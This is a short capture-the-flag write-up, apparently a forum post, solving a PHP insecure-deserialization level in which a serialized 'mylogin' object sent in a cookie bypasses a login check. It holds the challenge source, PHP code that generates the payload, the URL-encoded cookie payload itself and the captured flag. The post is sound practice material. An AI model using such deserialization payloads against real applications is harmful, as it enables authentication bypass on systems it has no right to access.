php-ser-libs-level3

zp,2025-11-28 21:08

<?php
include("flag.php");
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_COOKIE['param']);
if($a->login())
{
    echo $flag;
}
?> 
<br><a href="../level4">点击进入第四关</a>
Fatal error: Uncaught Error: Call to a member function login() on bool in /var/www/html/index.php:19 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 19

和二一样只不过从GET变成了cookie

<?php
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=new mylogin("daydream","ok");
echo urlencode(serialize($a));

payload：

param=O%3A7%3A%22mylogin%22%3A2%3A%7Bs%3A4%3A%22user%22%3Bs%3A8%3A%22daydream%22%3Bs%3A4%3A%22pass%22%3Bs%3A2%3A%22ok%22%3B%7D

Geesec{880cd415-da66-45fe-9823-a5c5670b49ff}

暂无回复。你的想法是什么？

GeeSec

商务合作

php-ser-libs-level3

zp 发起

php-ser-libs-level2

zp 发起

Rubbish_Unser